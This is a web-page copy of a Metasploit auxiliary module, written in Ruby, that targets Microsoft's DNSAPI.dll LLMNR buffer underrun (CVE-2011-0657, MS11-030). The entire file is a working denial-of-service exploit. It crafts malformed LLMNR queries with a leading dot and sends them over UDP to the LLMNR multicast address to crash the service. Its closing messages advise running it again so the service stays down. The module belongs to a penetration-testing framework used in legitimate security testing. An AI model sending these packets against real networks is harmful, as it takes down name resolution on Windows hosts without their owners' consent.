Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/dos/windows/llmnr/ms11_030_dnsapi.rb
19852 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::Udp

8
  include Msf::Auxiliary::Dos

9


10
  def initialize

11
    super(

12
      'Name' => 'Microsoft Windows DNSAPI.dll LLMNR Buffer Underrun DoS',

13
      'Description' => %q{

14
          This module exploits a buffer underrun vulnerability in Microsoft's DNSAPI.dll

15
        as distributed with Windows Vista and later without KB2509553. By sending a

16
        specially crafted LLMNR query, containing a leading '.' character, an attacker

17
        can trigger stack exhaustion or potentially cause stack memory corruption.

18


19
        Although this vulnerability may lead to code execution, it has not been proven

20
        to be possible at the time of this writing.

21


22
        NOTE: In some circumstances, a '.' may be found before the top of the stack is

23
        reached. In these cases, this module may not be able to cause a crash.

24
      },

25
      'Author' => 'jduck',

26
      'License' => MSF_LICENSE,

27
      'References' => [

28
        [ 'CVE', '2011-0657' ],

29
        [ 'OSVDB', '71780' ],

30
        [ 'MSB', 'MS11-030' ]

31
      ],

32
      'DisclosureDate' => 'Apr 12 2011',

33
      'Notes' => {

34
        'Stability' => [CRASH_SERVICE_DOWN],

35
        'SideEffects' => [],

36
        'Reliability' => []

37
      }

38
    )

39


40
    register_options(

41
      [

42
        Opt::RPORT(5355),

43
        Opt::RHOST('224.0.0.252')

44
      ]

45
    )

46
  end

47


48
  def make_query(str)

49
    pkt = ''

50


51
    # id

52
    pkt << [rand(65535)].pack('n')

53


54
    # flags

55
    pkt << [

56
      (

57
            '0' +     # qr

58
            '0000' +  # opcode

59
            '0' +     # conflict

60
            '0' +     # truncation

61
            '0' +     # tentative

62
            '0000' +  # zero (reserved)

63
            '0000'    # rcode

64
          )

65
    ].pack('B16')

66


67
    # counts

68
    pkt << [1, 0, 0, 0].pack('n*')

69


70
    if str[0, 1] == '.'

71
      pkt << [str.length].pack('C')

72
    end

73
    pkt << str + "\x00"

74


75
    # type / class (PTR/IN)

76
    pkt << [0x0c, 0x01].pack('n*')

77


78
    pkt

79
  end

80


81
  def run

82
    connect_udp

83


84
    # query

85


86
    # various compressed queries

87
    # pkt << "\x03" + ("%d" % 192)

88
    # pkt << "\x03" + "144" + "\x01" + "0" + "\x03" + "168" + "\x03" + "192"

89
    # pkt << ("\x01" + '1') * 0x20

90
    # pkt << "\x01" + '.'

91
    # pkt << ("\x01\x2e") + "\x01" + "0"

92
    # pkt << "\x07" + 'in-addr' + "\x04" + 'arpa' + "\x00"

93
    # pkt << "\x03" + 'ip6' + "\x04" + 'arpa' + "\x00"

94
    # pkt << ".e.e.e.e.e.e.e.e.e.e.e.e.e.e.e.e.0.0.0.0.0.0.0.0.0.0.0.0.0.8.e.f".gsub('.', "\x01") + "\x03ip6\x04arpa\x00"

95


96
    pkt = make_query('.1.1.ip6.arpa')

97
    print_status("Sending Ipv6 LLMNR query to #{rhost}")

98
    udp_sock.put(pkt)

99


100
    pkt = make_query('.1.1.in-addr.arpa')

101
    print_status("Sending Ipv4 LLMNR query to #{rhost}")

102
    udp_sock.put(pkt)

103


104
    print_status('Note, in a default configuration, the service will restart automatically twice.')

105
    print_status('In order to ensure it is completely dead, wait up to 5 minutes and run it again.')

106


107
    disconnect_udp

108
  end

109
end

110


111